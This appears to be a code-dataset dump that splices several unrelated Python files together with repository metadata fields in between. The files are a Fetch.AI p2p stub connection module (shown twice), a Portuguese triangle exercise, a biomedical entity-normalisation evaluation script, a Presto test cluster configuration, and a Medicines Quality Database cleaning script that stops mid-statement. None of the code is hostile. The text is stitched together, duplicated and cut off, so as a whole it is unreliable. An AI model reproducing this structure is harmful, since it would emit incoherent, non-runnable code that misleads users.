# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the p2p stub connection."""
import os
import tempfile
from pathlib import Path
from typing import Any, Union, cast
from aea.configurations.base import ConnectionConfig, PublicId
from aea.identity.base import Identity
from aea.mail.base import Envelope
from packages.fetchai.connections.stub.connection import StubConnection, write_envelope
PUBLIC_ID = PublicId.from_str("fetchai/p2p_stub:0.16.0")
class P2PStubConnection(StubConnection):
    r"""A p2p stub connection.
    This connection uses an existing directory as a Rendez-Vous point for agents to communicate locally.
    Each connected agent will create a file named after its address/identity where it can receive messages.
    The connection detects new messages by watchdogging the input file looking for new lines.
    """
    connection_id = PUBLIC_ID
    def __init__(
        self, configuration: ConnectionConfig, identity: Identity, **kwargs: Any
    ) -> None:
        """
        Initialize a p2p stub connection.
        :param configuration: the connection configuration
        :param identity: the identity
        """
        # Default to a fresh temp dir. Note tempfile.mkdtemp() is evaluated
        # eagerly, so an (unused) directory is created even when the
        # "namespace_dir" config key is present.
        namespace_dir_path = cast(
            Union[str, Path],
            configuration.config.get("namespace_dir", tempfile.mkdtemp()),
        )
        if namespace_dir_path is None:
            raise ValueError("namespace_dir_path must be set!") # pragma: nocover
        self.namespace = os.path.abspath(namespace_dir_path)
        # Per-agent mailbox files inside the shared namespace directory:
        # "<address>.in" for incoming, "<address>.out" for outgoing.
        input_file_path = os.path.join(self.namespace, "{}.in".format(identity.address))
        output_file_path = os.path.join(
            self.namespace, "{}.out".format(identity.address)
        )
        # Point the underlying StubConnection at these files via its config.
        configuration.config["input_file"] = input_file_path
        configuration.config["output_file"] = output_file_path
        super().__init__(configuration=configuration, identity=identity, **kwargs)
    async def send(self, envelope: Envelope) -> None:
        """
        Send messages.
        :return: None
        """
        if self.loop is None:
            raise ValueError("Loop not initialized.") # pragma: nocover
        self._ensure_valid_envelope_for_external_comms(envelope)
        # Append directly to the recipient's "<address>.in" mailbox file;
        # the blocking write is offloaded to the writer thread pool.
        target_file = Path(os.path.join(self.namespace, "{}.in".format(envelope.to)))
        with open(target_file, "ab") as file:
            await self.loop.run_in_executor(
                self._write_pool, write_envelope, envelope, file
            )
    async def disconnect(self) -> None:
        """Disconnect the connection."""
        if self.loop is None:
            raise ValueError("Loop not initialized.") # pragma: nocover
        # NOTE(review): self._cleanup is expected to be defined on this class
        # or a base class -- it is not visible in this excerpt.
        await self.loop.run_in_executor(self._write_pool, self._cleanup)
        await super().disconnect()
| 35.805556 | 107 | 0.639514 | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the p2p stub connection."""
import os
import tempfile
from pathlib import Path
from typing import Any, Union, cast
from aea.configurations.base import ConnectionConfig, PublicId
from aea.identity.base import Identity
from aea.mail.base import Envelope
from packages.fetchai.connections.stub.connection import StubConnection, write_envelope
PUBLIC_ID = PublicId.from_str("fetchai/p2p_stub:0.16.0")
class P2PStubConnection(StubConnection):
r"""A p2p stub connection.
This connection uses an existing directory as a Rendez-Vous point for agents to communicate locally.
Each connected agent will create a file named after its address/identity where it can receive messages.
The connection detects new messages by watchdogging the input file looking for new lines.
"""
connection_id = PUBLIC_ID
def __init__(
self, configuration: ConnectionConfig, identity: Identity, **kwargs: Any
) -> None:
"""
Initialize a p2p stub connection.
:param configuration: the connection configuration
:param identity: the identity
"""
namespace_dir_path = cast(
Union[str, Path],
configuration.config.get("namespace_dir", tempfile.mkdtemp()),
)
if namespace_dir_path is None:
raise ValueError("namespace_dir_path must be set!") # pragma: nocover
self.namespace = os.path.abspath(namespace_dir_path)
input_file_path = os.path.join(self.namespace, "{}.in".format(identity.address))
output_file_path = os.path.join(
self.namespace, "{}.out".format(identity.address)
)
configuration.config["input_file"] = input_file_path
configuration.config["output_file"] = output_file_path
super().__init__(configuration=configuration, identity=identity, **kwargs)
async def send(self, envelope: Envelope) -> None:
"""
Send messages.
:return: None
"""
if self.loop is None:
raise ValueError("Loop not initialized.") # pragma: nocover
self._ensure_valid_envelope_for_external_comms(envelope)
target_file = Path(os.path.join(self.namespace, "{}.in".format(envelope.to)))
with open(target_file, "ab") as file:
await self.loop.run_in_executor(
self._write_pool, write_envelope, envelope, file
)
async def disconnect(self) -> None:
"""Disconnect the connection."""
if self.loop is None:
raise ValueError("Loop not initialized.") # pragma: nocover
await self.loop.run_in_executor(self._write_pool, self._cleanup)
await super().disconnect()
def _cleanup(self) -> None:
try:
os.unlink(self.configuration.config["input_file"])
except OSError:
pass
try:
os.unlink(self.configuration.config["output_file"])
except OSError:
pass
try:
os.rmdir(self.namespace)
except OSError:
pass
| 332 | 0 | 27 |
45f23f6efe4ea3f63029af086469c8e887e61725 | 276 | py | Python | PythonDownload/pythonexercicios/ex035.py | GitGuii/PythonExs | afab77b311d23f7ed88d94e9ce927653cf648b29 | [
"MIT"
] | 1 | 2021-08-10T15:00:34.000Z | 2021-08-10T15:00:34.000Z | PythonDownload/pythonexercicios/ex035.py | GitGuii/PythonExs | afab77b311d23f7ed88d94e9ce927653cf648b29 | [
"MIT"
] | null | null | null | PythonDownload/pythonexercicios/ex035.py | GitGuii/PythonExs | afab77b311d23f7ed88d94e9ce927653cf648b29 | [
"MIT"
] | null | null | null | n1 = float(input('Digite o primeiro numero'))
n2 = float(input('Digite o segundo numero'))
n3 = float(input('Digite o terceiro numero'))
if n1 < (n2 + n3) and n2 < (n1 + n3) and n3 < (n2 + n1):
print('Podem formar um triangulo')
else:
print('Nao formam um triangulo')
| 34.5 | 56 | 0.652174 | n1 = float(input('Digite o primeiro numero'))
n2 = float(input('Digite o segundo numero'))
n3 = float(input('Digite o terceiro numero'))
if n1 < (n2 + n3) and n2 < (n1 + n3) and n3 < (n2 + n1):
print('Podem formar um triangulo')
else:
print('Nao formam um triangulo')
| 0 | 0 | 0 |
95475ab1680a0c52a5af6f1bf727e1a18b73e173 | 1,867 | py | Python | eval_adynorm.py | bestasoff/adynorm | e43488db2b49b4025faa280404bc44f6103c326d | [
"MIT"
] | 1 | 2021-11-10T07:49:13.000Z | 2021-11-10T07:49:13.000Z | eval_adynorm.py | bestasoff/adynorm | e43488db2b49b4025faa280404bc44f6103c326d | [
"MIT"
] | null | null | null | eval_adynorm.py | bestasoff/adynorm | e43488db2b49b4025faa280404bc44f6103c326d | [
"MIT"
] | 1 | 2021-11-10T16:09:36.000Z | 2021-11-10T16:09:36.000Z | import argparse
import logging
from transformers import (
set_seed,
)
from adynorm.eval_utils import (
evaluate
)
from adynorm.adynorm import Adynorm, AdynormNet
from adynorm.datasets import ConceptDataset, DictDataset
logger = logging.getLogger(__name__)
if __name__ == "__main__":
main()
| 24.893333 | 105 | 0.680771 | import argparse
import logging
from transformers import (
set_seed,
)
from adynorm.eval_utils import (
evaluate
)
from adynorm.adynorm import Adynorm, AdynormNet
from adynorm.datasets import ConceptDataset, DictDataset
logger = logging.getLogger(__name__)
def parse_args():
    """Parse command-line arguments for evaluation; returns an argparse.Namespace."""
    arg_parser = argparse.ArgumentParser(description='Arguments for entity classifier training.')
    # Required dataset locations.
    arg_parser.add_argument('--processed_val_path', required=True)
    arg_parser.add_argument('--val_dict_path', required=True)
    # Tunable evaluation settings with defaults.
    arg_parser.add_argument('--max_length', type=int, default=25)
    arg_parser.add_argument('--k', type=int, default=10)
    arg_parser.add_argument('--model_name_or_path', type=str, default='dmis-lab/biobert-base-cased-v1.1')
    arg_parser.add_argument('--seed', type=int, default=42)
    return arg_parser.parse_args()
def main():
args = parse_args()
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
logger.info("Training/evaluation parameters %s", args)
set_seed(args.seed)
device = 'cpu'
val_dictionary = DictDataset(args.val_dict_path).data
val_concept_dataset = ConceptDataset(
data_path=args.processed_val_path,
filter_duplicates=True,
filter_without_cui=True,
filter_composite_names=True
).data
adynorm = Adynorm(
max_length=args.max_length,
device=device
)
adynorm.load(args.model_name_or_path, args.model_name_or_path)
model = AdynormNet(encoder=adynorm.get_encoder()).to(device)
result = evaluate(adynorm, model.to('cpu'), val_dictionary, val_concept_dataset, 35, args.max_length)
for k in result.keys():
if k == 'preds':
continue
print(k, result[k])
if __name__ == "__main__":
main()
| 1,511 | 0 | 46 |
8347d76b22e0fced38a256902b83cd52fdf4bc5f | 786 | py | Python | tests/product/cluster_types.py | leniartek/trino-admin | 05104a0b35bbc4aeca9469b2fc63a21c814a7855 | [
"Apache-2.0"
] | 34 | 2016-01-08T21:02:13.000Z | 2017-03-10T02:01:03.000Z | tests/product/cluster_types.py | starburstdata/presto-admin | 1bb652debefe1e26e9105f8ffb08a8793790967a | [
"Apache-2.0"
] | 19 | 2019-05-16T13:09:25.000Z | 2020-12-04T18:01:39.000Z | tests/product/cluster_types.py | starburstdata/presto-admin | 1bb652debefe1e26e9105f8ffb08a8793790967a | [
"Apache-2.0"
] | 15 | 2019-03-07T16:37:06.000Z | 2020-11-12T12:07:46.000Z | from tests.product.mode_installers import StandaloneModeInstaller
from tests.product.prestoadmin_installer import PrestoadminInstaller
from tests.product.topology_installer import TopologyInstaller
from tests.product.standalone.presto_installer import StandalonePrestoInstaller
STANDALONE_BARE_CLUSTER = 'bare'
BARE_CLUSTER = 'bare'
STANDALONE_PA_CLUSTER = 'pa_only_standalone'
STANDALONE_PRESTO_CLUSTER = 'presto'
cluster_types = {
BARE_CLUSTER: [],
STANDALONE_PA_CLUSTER: [PrestoadminInstaller,
StandaloneModeInstaller],
STANDALONE_PRESTO_CLUSTER: [PrestoadminInstaller,
StandaloneModeInstaller,
TopologyInstaller,
StandalonePrestoInstaller],
}
| 37.428571 | 79 | 0.71883 | from tests.product.mode_installers import StandaloneModeInstaller
from tests.product.prestoadmin_installer import PrestoadminInstaller
from tests.product.topology_installer import TopologyInstaller
from tests.product.standalone.presto_installer import StandalonePrestoInstaller
STANDALONE_BARE_CLUSTER = 'bare'
BARE_CLUSTER = 'bare'
STANDALONE_PA_CLUSTER = 'pa_only_standalone'
STANDALONE_PRESTO_CLUSTER = 'presto'
cluster_types = {
BARE_CLUSTER: [],
STANDALONE_PA_CLUSTER: [PrestoadminInstaller,
StandaloneModeInstaller],
STANDALONE_PRESTO_CLUSTER: [PrestoadminInstaller,
StandaloneModeInstaller,
TopologyInstaller,
StandalonePrestoInstaller],
}
| 0 | 0 | 0 |
403675c7346f6a144ac3a6672c5e4b6d9556a72c | 61,411 | py | Python | scratchfiles/MQDscript.py | eugenewickett/logistigateanalysis | 5174f40db5f79bfd12491850cef53edde825b71b | [
"MIT"
] | null | null | null | scratchfiles/MQDscript.py | eugenewickett/logistigateanalysis | 5174f40db5f79bfd12491850cef53edde825b71b | [
"MIT"
] | null | null | null | scratchfiles/MQDscript.py | eugenewickett/logistigateanalysis | 5174f40db5f79bfd12491850cef53edde825b71b | [
"MIT"
] | null | null | null | # Workaround for the 'methods' file not being able to locate the 'mcmcsamplers' folder for importing
import sys
import os
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'logistigate')))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'logistigate', 'mcmcsamplers')))
import logistigate.logistigate.utilities as util # Pull from the submodule "develop" branch
import logistigate.logistigate.methods as methods # Pull from the submodule "develop" branch
import logistigate.logistigate.lg as lg # Pull from the submodule "develop" branch
def cleanMQD() -> dict:
    '''
    Script that cleans up raw Medicines Quality Database data for use in logistigate.
    It reads in a CSV file with columns 'Country,' 'Province,' 'Therapeutic Indication',
    'Manufacturer,' 'Facility Type', 'Date Sample Collected', 'Final Test Result,' and
    'Type of Test', and returns a dictionary of objects to be formatted for use with logistigate.

    Processing steps:
      1. Read the raw MQD CSV (expected at ../MQDfiles/MQD_ALL_CSV.csv relative
         to this script) and split it by country (Cambodia, Ghana, Philippines).
      2. Canonicalize 'Province' and 'Manufacturer' entries that are typos or
         near-duplicate spellings of the same entity.
      3. Build filtered frames by facility type, and therapeutic-indication
         frames (antimalarials for Cambodia/Ghana, anti-tuberculosis for the
         Philippines).
      4. Convert each frame into a list of [Province, Manufacturer, result]
         rows, where result is 1 if 'Final Test Result' == 'Fail' and 0
         otherwise (i.e., any non-'Fail' value counts as a pass).

    Returns
    -------
    dict
        Keys 'df_ALL', 'df_<CC>', 'df_<CC>_filt', 'df_<CC>_<indication>' map to
        pandas DataFrames; the parallel 'dataTbl_*' keys map to the
        [province, manufacturer, 0/1] lists suitable for
        util.testresultsfiletotable(..., csvName=False).
    '''
    # Read in the raw database file
    import pandas as pd
    SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
    filesPath = os.path.join(SCRIPT_DIR, '../MQDfiles')
    MQD_df = pd.read_csv(os.path.join(filesPath,'MQD_ALL_CSV.csv')) # Main raw database file
    # Get data particular to each country of interest
    MQD_df_CAM = MQD_df[MQD_df['Country'] == 'Cambodia'].copy()
    MQD_df_GHA = MQD_df[MQD_df['Country'] == 'Ghana'].copy()
    MQD_df_PHI = MQD_df[MQD_df['Country'] == 'Philippines'].copy()

    # Consolidate typos or seemingly identical entries in significant categories.
    # Each .loc assignment below selects all rows matching any known spelling
    # variant and overwrites the column with a single canonical name.
    # Cambodia
    # Province
    MQD_df_CAM.loc[
        (MQD_df_CAM.Province == 'Ratanakiri') | (MQD_df_CAM.Province == 'Rattanakiri'), 'Province'] = 'Ratanakiri'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Province == 'Steung Treng') | (MQD_df_CAM.Province == 'Stung Treng'), 'Province'] = 'Stung Treng'
    # Manufacturer
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Acdhon Co., Ltd') | (MQD_df_CAM.Manufacturer == 'Acdhon Company Ltd'),
        'Manufacturer'] = 'Acdhon Co., Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Alembic Limited') | (MQD_df_CAM.Manufacturer == 'Alembic Pharmaceuticals Ltd'),
        'Manufacturer'] = 'Alembic Limited'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'ALICE PHARMA PVT LTD') | (MQD_df_CAM.Manufacturer == 'Alice Pharma Pvt.Ltd')
        | (MQD_df_CAM.Manufacturer == 'Alice Pharmaceuticals'), 'Manufacturer'] = 'Alice Pharmaceuticals'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Atoz Pharmaceutical Pvt.Ltd') | (MQD_df_CAM.Manufacturer == 'Atoz Pharmaceuticals Ltd'),
        'Manufacturer'] = 'Atoz Pharmaceuticals Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Aurobindo Pharma LTD') | (MQD_df_CAM.Manufacturer == 'Aurobindo Pharma Ltd.')
        | (MQD_df_CAM.Manufacturer == 'Aurobindo Pharmaceuticals Ltd'), 'Manufacturer'] = 'Aurobindo'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Aventis') | (MQD_df_CAM.Manufacturer == 'Aventis Pharma Specialite'),
        'Manufacturer'] = 'Aventis'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Bright Future Laboratories') | (MQD_df_CAM.Manufacturer == 'Bright Future Pharma'),
        'Manufacturer'] = 'Bright Future Laboratories'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Burapha') | (MQD_df_CAM.Manufacturer == 'Burapha Dispensary Co, Ltd'),
        'Manufacturer'] = 'Burapha'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'CHANKIT') | (MQD_df_CAM.Manufacturer == 'Chankit Trading Ltd')
        | (MQD_df_CAM.Manufacturer == 'Chankit trading Ltd, Part'),
        'Manufacturer'] = 'Chankit Trading Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratoire Co., LTD') | (MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratories Co., Ltd')
        | (MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratory Company Ltd'),
        'Manufacturer'] = 'Chea Chamnan Laboratory Company Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Cipla Ltd.') | (MQD_df_CAM.Manufacturer == 'Cipla Ltd'),
        'Manufacturer'] = 'Cipla Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMP EXP JOINT STOCK CORP')
        | (MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMP EXP JOINT_stock corp')
        | (MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMPORT EXPORT JOINT STOCK CORP')
        | (MQD_df_CAM.Manufacturer == 'Domesco'),
        'Manufacturer'] = 'Domesco'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Emcure Pharmaceutical') | (MQD_df_CAM.Manufacturer == 'Emcure'),
        'Manufacturer'] = 'Emcure'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Eurolife Healthcare Pvt Ltd') | (MQD_df_CAM.Manufacturer == 'Eurolife'),
        'Manufacturer'] = 'Eurolife'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Flamingo Pharmaceutical Limited') | (MQD_df_CAM.Manufacturer == 'Flamingo Pharmaceuticals Ltd'),
        'Manufacturer'] = 'Flamingo Pharmaceuticals Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Global Pharma Health care PVT-LTD')
        | (MQD_df_CAM.Manufacturer == 'GlobalPharma Healthcare Pvt-Ltd')
        | (MQD_df_CAM.Manufacturer == 'Global Pharma'),
        'Manufacturer'] = 'Global Pharma'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Gracure Pharmaceuticals Ltd.') | (MQD_df_CAM.Manufacturer == 'Gracure Pharmaceuticals'),
        'Manufacturer'] = 'Gracure Pharmaceuticals'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Il Dong Pharmaceutical Company Ltd') | (MQD_df_CAM.Manufacturer == 'Il Dong Pharmaceuticals Ltd'),
        'Manufacturer'] = 'Il Dong Pharmaceuticals Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Khandelwal Laboratories Ltd')
        | (MQD_df_CAM.Manufacturer == 'Khandewal Lab')
        | (MQD_df_CAM.Manufacturer == 'Khandelwal'),
        'Manufacturer'] = 'Khandelwal'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Laboratories EPHAC Co., Ltd')
        | (MQD_df_CAM.Manufacturer == 'EPHAC Laboratories Ltd'),
        'Manufacturer'] = 'Laboratories EPHAC Co., Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Lyka Laboratories Ltd')
        | (MQD_df_CAM.Manufacturer == 'Lyka Labs Limited.')
        | (MQD_df_CAM.Manufacturer == 'Lyka Labs'),
        'Manufacturer'] = 'Lyka Labs'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Marksans Pharmaceuticals Ltd') | (MQD_df_CAM.Manufacturer == 'Marksans Pharma Ltd.')
        | (MQD_df_CAM.Manufacturer == 'Marksans Pharma Ltd.,'),
        'Manufacturer'] = 'Marksans Pharma Ltd.'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'MASALAB') | (MQD_df_CAM.Manufacturer == 'Masa Lab Co., Ltd'),
        'Manufacturer'] = 'Masa Lab Co., Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Medical Supply Pharmaceutical Enterprise')
        | (MQD_df_CAM.Manufacturer == 'Medical Supply Pharmaceutical Enteprise'),
        'Manufacturer'] = 'Medical Supply Pharmaceutical Enterprise'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Medopharm Pvt. Ltd.')
        | (MQD_df_CAM.Manufacturer == 'Medopharm'),
        'Manufacturer'] = 'Medopharm'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Micro Laboratories Ltd') | (MQD_df_CAM.Manufacturer == 'MICRO LAB LIMITED')
        | (MQD_df_CAM.Manufacturer == 'Micro Labs Ltd') | (MQD_df_CAM.Manufacturer == 'Microlabs Limited'),
        'Manufacturer'] = 'Microlabs'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Millimed Co., Ltd Thailand')
        | (MQD_df_CAM.Manufacturer == 'Millimed'),
        'Manufacturer'] = 'Millimed'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Orchid Health Care') | (MQD_df_CAM.Manufacturer == 'Orchid Health'),
        'Manufacturer'] = 'Orchid Health'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Osoth Inter Laboratory Co., LTD') | (MQD_df_CAM.Manufacturer == 'Osoth Inter Laboratories'),
        'Manufacturer'] = 'Osoth Inter Laboratories'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'PHARMASANT LABORATORIES Co.,LTD') | (MQD_df_CAM.Manufacturer == 'Pharmasant Laboratories Co., Ltd'),
        'Manufacturer'] = 'Pharmasant Laboratories Co., Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Plethico Pharmaceuticals, Ltd')
        | (MQD_df_CAM.Manufacturer == 'Plethico Pharmaceuticals Ltd')
        | (MQD_df_CAM.Manufacturer == 'Plethico Pharmaceutical Ltd')
        | (MQD_df_CAM.Manufacturer == 'Plethico'),
        'Manufacturer'] = 'Plethico'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'PPM Laboratory') | (MQD_df_CAM.Manufacturer == 'PPM')
        | (MQD_df_CAM.Manufacturer == 'Pharma Product Manufacturing'),
        'Manufacturer'] = 'PPM'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Ranbaxy Laboratories Limited.')
        | (MQD_df_CAM.Manufacturer == 'Ranbaxy Pharmaceuticals'),
        'Manufacturer'] = 'Ranbaxy Pharmaceuticals'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Shijiazhuang Pharma Group Zhongnuo Pharmaceutical [Shijiazhuang] Co.,LTD')
        | (MQD_df_CAM.Manufacturer == 'Shijiazhuang Pharmaceutical Group Ltd'),
        'Manufacturer'] = 'Shijiazhuang Pharmaceutical Group Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Sanofi-Aventis Vietnam') | (MQD_df_CAM.Manufacturer == 'Sanofi Aventis'),
        'Manufacturer'] = 'Sanofi Aventis'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Stada Vietnam Joint Venture Co., Ltd.') | (MQD_df_CAM.Manufacturer == 'Stada Vietnam Joint Venture'),
        'Manufacturer'] = 'Stada Vietnam Joint Venture'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Shandong Reyoung Pharmaceutical Co., Ltd') | (
                MQD_df_CAM.Manufacturer == 'Shandong Reyoung Pharmaceuticals Ltd'),
        'Manufacturer'] = 'Shandong Reyoung Pharmaceuticals Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'T Man Pharma Ltd. Part.')
        | (MQD_df_CAM.Manufacturer == 'T-MAN Pharma Ltd., Part')
        | (MQD_df_CAM.Manufacturer == 'T-Man Pharmaceuticals Ltd'),
        'Manufacturer'] = 'T-Man Pharmaceuticals Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Umedica Laboratories PVT. LTD.')
        | (MQD_df_CAM.Manufacturer == 'Umedica Laboratories PVT. Ltd')
        | (MQD_df_CAM.Manufacturer == 'Umedica Laboratories Pvt Ltd')
        | (MQD_df_CAM.Manufacturer == 'Umedica'),
        'Manufacturer'] = 'Umedica'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Utopian Co,.LTD') | (MQD_df_CAM.Manufacturer == 'Utopian Co., Ltd')
        | (MQD_df_CAM.Manufacturer == 'Utopian Company Ltd'),
        'Manufacturer'] = 'Utopian Company Ltd'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Vesco Pharmaceutical Ltd.,Part')
        | (MQD_df_CAM.Manufacturer == 'Vesco Pharmaceutical Ltd Part'),
        'Manufacturer'] = 'Vesco Pharmaceutical Ltd Part'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Yanzhou Xier Kangtai Pharmaceutical Co., Ltd')
        | (MQD_df_CAM.Manufacturer == 'Yanzhou Xier Kangtai Pharm'),
        'Manufacturer'] = 'Yanzhou Xier Kangtai Pharm'
    MQD_df_CAM.loc[
        (MQD_df_CAM.Manufacturer == 'Zhangjiakou DongFang pharmaceutical Co., Ltd')
        | (MQD_df_CAM.Manufacturer == 'Zhangjiakou Dongfang Phamaceutical'),
        'Manufacturer'] = 'Zhangjiakou Dongfang Phamaceutical'
    # Ghana
    # Province
    MQD_df_GHA.loc[
        (MQD_df_GHA.Province == 'Northern') | (MQD_df_GHA.Province == 'Northern Region')
        | (MQD_df_GHA.Province == 'Northern Region, Northern Region'),
        'Province'] = 'Northern'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Province == 'Western (Ghana)'),
        'Province'] = 'Western'
    # Manufacturer
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Ajanta Pharma Ltd') | (MQD_df_GHA.Manufacturer == 'Ajanta Pharma Ltd.'),
        'Manufacturer'] = 'Ajanta Pharma Ltd.'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Ally Pharma Options Pvt Ltd.') | (MQD_df_GHA.Manufacturer == 'Ally Pharma Options Pvt. Ltd'),
        'Manufacturer'] = 'Ally Pharma Options Pvt. Ltd'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Bliss GVS Pharma Ltd') | (MQD_df_GHA.Manufacturer == 'Bliss GVS Pharmaceuticals Ltd.'),
        'Manufacturer'] = 'Bliss GVS Pharma Ltd'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Cipla Ltd. India') | (MQD_df_GHA.Manufacturer == 'Cipla Ltd'),
        'Manufacturer'] = 'Cipla Ltd'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Danadams Pharmaceutical Industry Limited')
        | (MQD_df_GHA.Manufacturer == 'Danadams Pharmaceutical Industry, Ltd.')
        | (MQD_df_GHA.Manufacturer == 'Danadams Pharmaceuticals Industry Limited'),
        'Manufacturer'] = 'Danadams'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Guilin Pharmaceutical Company Ltd.')
        | (MQD_df_GHA.Manufacturer == 'Guilin Pharmaceutical Co. Ltd')
        | (MQD_df_GHA.Manufacturer == 'Guilin Pharmaceutical Co., Ltd'),
        'Manufacturer'] = 'Guilin'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Kinapharma Limited') | (MQD_df_GHA.Manufacturer == 'Kinapharma Ltd'),
        'Manufacturer'] = 'Kinapharma'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Maphar Laboratories') | (MQD_df_GHA.Manufacturer == 'Maphar'),
        'Manufacturer'] = 'Maphar'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Novartis Pharmaceutical Corporation')
        | (MQD_df_GHA.Manufacturer == 'Novartis Pharmaceuticals Corporation'),
        'Manufacturer'] = 'Novartis'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Pharmanova Limited')
        | (MQD_df_GHA.Manufacturer == 'Pharmanova Ltd'),
        'Manufacturer'] = 'Pharmanova'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Phyto-Riker (Gihoc) Pharmaceuticals Ltd')
        | (MQD_df_GHA.Manufacturer == 'Phyto-Riker (Gihoc) Pharmaceuticals, Ltd.'),
        'Manufacturer'] = 'Phyto-Riker'
    MQD_df_GHA.loc[
        (MQD_df_GHA.Manufacturer == 'Ronak Exim PVT. Ltd')
        | (MQD_df_GHA.Manufacturer == 'Ronak Exim Pvt Ltd'),
        'Manufacturer'] = 'Ronak Exim'
    # Philippines
    # Province
    MQD_df_PHI.loc[(MQD_df_PHI.Province == 'CALABARZON'), 'Province'] = 'Calabarzon'
    MQD_df_PHI.loc[(MQD_df_PHI.Province == 'region 1 '), 'Province'] = 'Region 1'
    MQD_df_PHI.loc[(MQD_df_PHI.Province == 'region7'), 'Province'] = 'Region 7'
    MQD_df_PHI.loc[(MQD_df_PHI.Province == 'region9'), 'Province'] = 'Region 9'
    # Manufacturer
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'AM-Europharma')
                   | (MQD_df_PHI.Manufacturer == 'Am-Euro Pharma Corporation'),
                   'Manufacturer'] = 'AM-Europharma'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Amherst Laboratories Inc')
